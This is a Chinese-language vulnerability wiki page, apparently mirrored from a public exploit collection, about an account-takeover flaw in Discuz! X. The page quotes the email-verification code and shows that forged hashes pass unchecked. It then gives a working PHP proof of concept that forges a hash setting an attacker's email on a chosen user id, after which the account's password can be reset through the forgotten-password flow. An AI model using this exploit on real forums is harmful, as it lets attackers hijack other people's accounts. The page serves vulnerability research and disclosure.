menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Discuz chevron_right Discuz! X authkey 重置任意账户邮箱.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Discuz! X authkey 重置任意账户邮箱.md
    5.6 KB / 2021-04-21 09:23:46
        Discuz! X authkey 重置任意账户邮箱
    ==================================
    
    一、漏洞简介
    ------------
    
    需要得到authkey
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    当我们申请修改邮箱的时候,我们会受到一封类似于下面这样的邮件。
    
    ![](./resource/Discuz!Xauthkey重置任意账户邮箱/media/rId24.png)
    
    验证链接类似于
    
        http://www.0-sec.org/dz3.3/home.php?mod=misc&ac=emailcheck&hash=0eb7yY2wtS1q16Zs2%2BtSkR6w5O%2Fx6jdLbu0FnWbegB8ixs2Y6tfcyAnrvz4yPIE7pKzoqawU0ku47y4F
    
    跟入`/source/include/misc/misc_emailcheck.php` 代码如下:
    
        <?php
        /**
         *      [Discuz!] (C)2001-2099 Comsenz Inc.
         *      This is NOT a freeware, use is subject to license terms
         *
         *      $Id: misc_emailcheck.php 33688 2013-08-02 03:00:15Z nemohou $
         */
        if(!defined('IN_DISCUZ')) {
            exit('Access Denied');
        }
        $uid = 0;
        $email = '';
        $_GET['hash'] = empty($_GET['hash']) ? '' : $_GET['hash'];
        if($_GET['hash']) {
            list($uid, $email, $time) = explode("\t", authcode($_GET['hash'], 'DECODE', md5(substr(md5($_G['config']['security']['authkey']), 0, 16))));
            $uid = intval($uid);
        }
        // exit($email);
        if($uid && isemail($email) && $time > TIMESTAMP - 86400) {
            $member = getuserbyuid($uid);
            $setarr = array('email'=>$email, 'emailstatus'=>'1');
            if($_G['member']['freeze'] == 2) {
                $setarr['freeze'] = 0;
            }
            loaducenter();
            $ucresult = uc_user_edit(addslashes($member['username']), '', '', $email, 1);
            if($ucresult == -8) {
                showmessage('email_check_account_invalid', '', array(), array('return' => true));
            } elseif($ucresult == -4) {
                showmessage('profile_email_illegal', '', array(), array('return' => true));
            } elseif($ucresult == -5) {
                showmessage('profile_email_domain_illegal', '', array(), array('return' => true));
            } elseif($ucresult == -6) {
                showmessage('profile_email_duplicate', '', array(), array('return' => true));
            }
            if($_G['setting']['regverify'] == 1 && $member['groupid'] == 8) {
                $membergroup = C::t('common_usergroup')->fetch_by_credits($member['credits']);
                $setarr['groupid'] = $membergroup['groupid'];
            }
            updatecreditbyaction('realemail', $uid);
            C::t('common_member')->update($uid, $setarr);
            C::t('common_member_validate')->delete($uid);
            dsetcookie('newemail', "", -1);
            showmessage('email_check_sucess', 'home.php?mod=spacecp&ac=profile&op=password', array('email' => $email));
        } else {
            showmessage('email_check_error', 'index.php');
        }
        ?>
    
    当hash传入的时候,服务端会调用authcode函数解码获得用户的uid,要修改成的email,时间戳。
    
        list($uid, $email, $time) = explode("\t", authcode($_GET['hash'], 'DECODE', md5(substr(md5($_G['config']['security']['authkey']), 0, 16))));
    
    然后经过一次判断
    
        if($uid && isemail($email) && $time > TIMESTAMP - 86400) {
    
    这里没有任何额外的判断,在接下来的部分,也仅仅对uid的有效性做了判断,而uid代表这用户的id值,是从1开始自增的。
    
    也就是说,只要authcode函数解开hash值,就能成功的验证并修改邮箱。
    
    这里我们可以直接使用authcode函数来获得hash值
    
    ### poc
    
    > 这里需要修改md5(\"authkey\")
    
        <?php
                //Enter your code here, enjoy!
        function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
            $ckey_length = 4;
            $key = md5($key ? $key : UC_KEY);
            $keya = md5(substr($key, 0, 16));
            $keyb = md5(substr($key, 16, 16));
            $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
            $cryptkey = $keya.md5($keya.$keyc);
            $key_length = strlen($cryptkey);
            $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
            $string_length = strlen($string);
            $result = '';
            $box = range(0, 255);
            $rndkey = array();
            for($i = 0; $i <= 255; $i++) {
                $rndkey[$i] = ord($cryptkey[$i % $key_length]);
            }
            for($j = $i = 0; $i < 256; $i++) {
                $j = ($j + $box[$i] + $rndkey[$i]) % 256;
                $tmp = $box[$i];
                $box[$i] = $box[$j];
                $box[$j] = $tmp;
            }
            for($a = $j = $i = 0; $i < $string_length; $i++) {
                $a = ($a + 1) % 256;
                $j = ($j + $box[$a]) % 256;
                $tmp = $box[$a];
                $box[$a] = $box[$j];
                $box[$j] = $tmp;
                $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
            }
            if($operation == 'DECODE') {
                if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
                    return substr($result, 26);
                } else {
                    return '';
                }
            } else {
                return $keyc.str_replace('=', '', base64_encode($result));
            }
        }
        echo authcode("3\[email protected]\t1503556905", 'ENCODE', md5(substr(md5("5e684ceqNxuCvmoK"), 0, 16)));
    
    访问hash页面,我们可以看到验证邮箱已经被修改了,接下来我们可以直接通过忘记密码来修改当前用户的密码。
    
    ![](./resource/Discuz!Xauthkey重置任意账户邮箱/media/rId26.png)
    
    参考链接
    --------
    
    > https://lorexxar.cn/2017/08/31/dz-authkey/\#%E6%BC%8F%E6%B4%9E%E8%AF%A6%E6%83%85
    
    
    links
    file_download